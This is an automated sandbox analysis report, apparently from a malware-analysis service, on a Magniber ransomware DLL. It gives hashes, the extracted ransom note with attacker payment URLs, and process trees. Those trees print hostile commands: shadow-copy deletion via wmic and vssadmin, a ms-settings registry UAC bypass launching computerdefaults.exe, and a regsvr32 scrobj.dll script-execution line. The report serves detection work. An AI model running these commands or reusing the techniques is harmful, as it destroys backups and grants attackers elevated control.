magniber | 2b474cca6c5ff5e1d435d91694b4436876901e3be9c63c3a1d76ff3dbc432017

Analysis

max time kernel
175s
max time network
185s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
29-12-2023 18:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

009aaaf3b4f3a34b662cb9d27fb4409d.dll
Size

39KB
MD5

009aaaf3b4f3a34b662cb9d27fb4409d
SHA1

ac5bfd05ec67090c4f7180519628328e29f3f39a
SHA256

2b474cca6c5ff5e1d435d91694b4436876901e3be9c63c3a1d76ff3dbc432017
SHA512

50973c3ac2849c8664d74d7efc07fcb0a43260d05030fa7772f135cf716357d522309e70d7ba4ee51cd44ea7a3c711b321221b33ab192ccce6ee71dceb527aea
SSDEEP

768:QJvL0rvzhHm06R0Zd+01mV0kgMazfo269xnWf77/KrkVPe4kQKNNJ7kIGsp9C88K:q0rvzhV6Ra+01Y0dMio39xWDrKrkVm4i

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://049844887a00da604csgokwyejx.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/sgokwyejx Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://049844887a00da604csgokwyejx.actmake.site/sgokwyejx http://049844887a00da604csgokwyejx.bearsat.space/sgokwyejx http://049844887a00da604csgokwyejx.mixedon.xyz/sgokwyejx http://049844887a00da604csgokwyejx.spiteor.space/sgokwyejx Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://049844887a00da604csgokwyejx.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/sgokwyejx

http://049844887a00da604csgokwyejx.actmake.site/sgokwyejx

http://049844887a00da604csgokwyejx.bearsat.space/sgokwyejx

http://049844887a00da604csgokwyejx.mixedon.xyz/sgokwyejx

http://049844887a00da604csgokwyejx.spiteor.space/sgokwyejx

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral2/memory/4820-0-0x00000298723D0000-0x000002987270A000-memory.dmp	family_magniber
behavioral2/memory/2508-14-0x0000022A68CD0000-0x0000022A68CD4000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 20 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2972	4628	cmd.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2528	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3824	4628	cmd.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4512	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1452	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4236	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5788	4628	cmd.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5300	4628	cmd.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3164	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4896	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4984	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5940	4628	cmd.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5528	4628	cmd.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3228	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5960	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5704	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5500	4628	cmd.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3488	4628	cmd.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6064	4628	vssadmin.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6048	4628	vssadmin.exe	92

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (93) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4820 set thread context of 2508	4820	rundll32.exe	54
PID 4820 set thread context of 2520	4820	rundll32.exe	53
PID 4820 set thread context of 2756	4820	rundll32.exe	47
PID 4820 set thread context of 3308	4820	rundll32.exe	42

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
4896	vssadmin.exe
3228	vssadmin.exe
5960	vssadmin.exe
6048	vssadmin.exe
3164	vssadmin.exe
4512	vssadmin.exe
1452	vssadmin.exe
4236	vssadmin.exe
4984	vssadmin.exe
5704	vssadmin.exe
6064	vssadmin.exe
2528	vssadmin.exe

Modifies registry class 20 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000_Classes\ms-settings\shell\open	sihost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3564	notepad.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4820	rundll32.exe
4820	rundll32.exe
2020	msedge.exe
2020	msedge.exe
3988	msedge.exe
3988	msedge.exe
5324	identity_helper.exe
5324	identity_helper.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
4820	rundll32.exe
4820	rundll32.exe
4820	rundll32.exe
4820	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4228	wmic.exe
Token: SeSecurityPrivilege	4228	wmic.exe
Token: SeTakeOwnershipPrivilege	4228	wmic.exe
Token: SeLoadDriverPrivilege	4228	wmic.exe
Token: SeSystemProfilePrivilege	4228	wmic.exe
Token: SeSystemtimePrivilege	4228	wmic.exe
Token: SeProfSingleProcessPrivilege	4228	wmic.exe
Token: SeIncBasePriorityPrivilege	4228	wmic.exe
Token: SeCreatePagefilePrivilege	4228	wmic.exe
Token: SeBackupPrivilege	4228	wmic.exe
Token: SeRestorePrivilege	4228	wmic.exe
Token: SeShutdownPrivilege	4228	wmic.exe
Token: SeDebugPrivilege	4228	wmic.exe
Token: SeSystemEnvironmentPrivilege	4228	wmic.exe
Token: SeRemoteShutdownPrivilege	4228	wmic.exe
Token: SeUndockPrivilege	4228	wmic.exe
Token: SeManageVolumePrivilege	4228	wmic.exe
Token: 33	4228	wmic.exe
Token: 34	4228	wmic.exe
Token: 35	4228	wmic.exe
Token: 36	4228	wmic.exe
Token: SeIncreaseQuotaPrivilege	2116	WMIC.exe
Token: SeSecurityPrivilege	2116	WMIC.exe
Token: SeTakeOwnershipPrivilege	2116	WMIC.exe
Token: SeLoadDriverPrivilege	2116	WMIC.exe
Token: SeSystemProfilePrivilege	2116	WMIC.exe
Token: SeSystemtimePrivilege	2116	WMIC.exe
Token: SeProfSingleProcessPrivilege	2116	WMIC.exe
Token: SeIncBasePriorityPrivilege	2116	WMIC.exe
Token: SeCreatePagefilePrivilege	2116	WMIC.exe
Token: SeBackupPrivilege	2116	WMIC.exe
Token: SeRestorePrivilege	2116	WMIC.exe
Token: SeShutdownPrivilege	2116	WMIC.exe
Token: SeDebugPrivilege	2116	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2116	WMIC.exe
Token: SeRemoteShutdownPrivilege	2116	WMIC.exe
Token: SeUndockPrivilege	2116	WMIC.exe
Token: SeManageVolumePrivilege	2116	WMIC.exe
Token: 33	2116	WMIC.exe
Token: 34	2116	WMIC.exe
Token: 35	2116	WMIC.exe
Token: 36	2116	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2436	WMIC.exe
Token: SeSecurityPrivilege	2436	WMIC.exe
Token: SeTakeOwnershipPrivilege	2436	WMIC.exe
Token: SeLoadDriverPrivilege	2436	WMIC.exe
Token: SeSystemProfilePrivilege	2436	WMIC.exe
Token: SeSystemtimePrivilege	2436	WMIC.exe
Token: SeProfSingleProcessPrivilege	2436	WMIC.exe
Token: SeIncBasePriorityPrivilege	2436	WMIC.exe
Token: SeCreatePagefilePrivilege	2436	WMIC.exe
Token: SeBackupPrivilege	2436	WMIC.exe
Token: SeRestorePrivilege	2436	WMIC.exe
Token: SeShutdownPrivilege	2436	WMIC.exe
Token: SeDebugPrivilege	2436	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2436	WMIC.exe
Token: SeRemoteShutdownPrivilege	2436	WMIC.exe
Token: SeUndockPrivilege	2436	WMIC.exe
Token: SeManageVolumePrivilege	2436	WMIC.exe
Token: 33	2436	WMIC.exe
Token: 34	2436	WMIC.exe
Token: 35	2436	WMIC.exe
Token: 36	2436	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4228	wmic.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe
3988	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2508 wrote to memory of 3564	2508	sihost.exe	101
PID 2508 wrote to memory of 3564	2508	sihost.exe	101
PID 2508 wrote to memory of 3736	2508	sihost.exe	103
PID 2508 wrote to memory of 3736	2508	sihost.exe	103
PID 2508 wrote to memory of 4228	2508	sihost.exe	104
PID 2508 wrote to memory of 4228	2508	sihost.exe	104
PID 2508 wrote to memory of 3724	2508	sihost.exe	105
PID 2508 wrote to memory of 3724	2508	sihost.exe	105
PID 2508 wrote to memory of 4872	2508	sihost.exe	106
PID 2508 wrote to memory of 4872	2508	sihost.exe	106
PID 3724 wrote to memory of 2116	3724	cmd.exe	111
PID 3724 wrote to memory of 2116	3724	cmd.exe	111
PID 4872 wrote to memory of 2436	4872	cmd.exe	112
PID 4872 wrote to memory of 2436	4872	cmd.exe	112
PID 3824 wrote to memory of 1592	3824	cmd.exe	119
PID 3824 wrote to memory of 1592	3824	cmd.exe	119
PID 2972 wrote to memory of 1932	2972	cmd.exe	120
PID 2972 wrote to memory of 1932	2972	cmd.exe	120
PID 3736 wrote to memory of 3988	3736	cmd.exe	122
PID 3736 wrote to memory of 3988	3736	cmd.exe	122
PID 1592 wrote to memory of 3064	1592	ComputerDefaults.exe	128
PID 1592 wrote to memory of 3064	1592	ComputerDefaults.exe	128
PID 1932 wrote to memory of 4340	1932	ComputerDefaults.exe	140
PID 1932 wrote to memory of 4340	1932	ComputerDefaults.exe	140
PID 3988 wrote to memory of 3048	3988	msedge.exe	129
PID 3988 wrote to memory of 3048	3988	msedge.exe	129
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135
PID 3988 wrote to memory of 2616	3988	msedge.exe	135

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
PID:3308
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\009aaaf3b4f3a34b662cb9d27fb4409d.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4820
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3832
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4632
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5096
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5480
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1968

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
PID:2756
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5564
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5360
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5464
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4560
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:2520
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4512
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4340
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5256
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5088
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5264

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2508
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3564
- C:\Windows\system32\cmd.exe
  cmd /c "start http://049844887a00da604csgokwyejx.actmake.site/sgokwyejx^&2^&50878022^&93^&375^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3736
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://049844887a00da604csgokwyejx.actmake.site/sgokwyejx&2&50878022&93&375&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3988
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff999f46f8,0x7fff999f4708,0x7fff999f4718
      4⤵
      PID:3048
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
      4⤵
      PID:2616
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
      4⤵
      PID:264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
      4⤵
      PID:1708
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
      4⤵
      PID:4672
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
      4⤵
      PID:4560
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1
      4⤵
      PID:5184
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4596 /prefetch:8
      4⤵
      PID:5308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4596 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
      4⤵
      PID:5428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13977432720409361536,11626390159896512161,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
      4⤵
      PID:5420
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
